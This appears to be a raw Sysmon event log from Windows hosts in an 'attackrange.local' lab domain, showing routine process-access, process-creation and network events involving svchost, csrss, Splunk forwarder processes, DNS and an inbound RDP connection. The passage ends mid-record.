09:20:35.878{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054446Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.878{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054445Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.878{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054444Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.878{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054443Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.878{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054442Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.878{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054441Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.878{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054440Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.878{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054439Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.878{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CE3-6151-7700-00000000FD01}704C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054438Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.878{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CE3-6151-7700-00000000FD01}704C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054437Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.700{5EBD8912-8CE3-6151-7700-00000000FD01}704C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001054436Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.300{5EBD8912-8CE2-6151-7600-00000000FD01}21282400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001054435Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:33.367{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-49170- 354300x80000000000000001054434Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:32.992{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-54788- 10341000x80000000000000001054433Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.003{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CE2-6151-7600-00000000FD01}2128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054432Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.003{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054431Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.003{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054430Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.003{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054429Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.003{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054428Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.003{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054427Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.003{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054426Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.003{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054425Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.003{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054424Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.003{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054423Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.003{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CE2-6151-7600-00000000FD01}2128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054422Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.003{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CE2-6151-7600-00000000FD01}2128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054421Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:34.808{5EBD8912-8CE2-6151-7600-00000000FD01}2128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000980641Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:32.678{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse110.10.193.201-55684-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980640Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:35.165{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 